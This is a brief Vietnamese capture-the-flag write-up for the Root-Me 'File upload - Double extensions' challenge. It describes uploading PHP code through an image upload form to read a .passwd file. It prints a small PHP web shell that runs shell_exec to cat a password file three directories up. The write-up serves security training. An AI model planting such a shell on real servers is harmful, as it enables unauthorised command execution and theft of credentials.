File upload - Double extensions¶

Estimated time to read: 2 minutes

May 09, 2023

Tài nguyên và link challenge¶

Tài nguyên của challenge này tại https://www.root-me.org/en/Challenges/Web-Server/File-upload-Double-extensions

Link challenge này tại http://challenge01.root-me.org/web-serveur/ch20/

Tổng quan¶

Trong challenge này, mục tiêu của ta là hack thư viện ảnh bằng cách tải liên đoạn mã php. Lấy mật khẩu trong tệp .passwd

Kịch bản tấn công¶

Challenge này cung cấp cho chúng ta một website có chức năng upload ảnh. Hơn nữa, lại còn cho ta biết có file .passwd tồn tại trong website. Ta thử LFI vào file xem sao

Ta không thể truy cập được file. Bây giờ, ta sẽ tiêm code php vào và nhận được password

Với đoạn code cần tiêm là

1
2
3
4

<?php
$output = shell_exec('cat ../../../.passwd');
echo "<pre>$output</pre>";
?>

Comments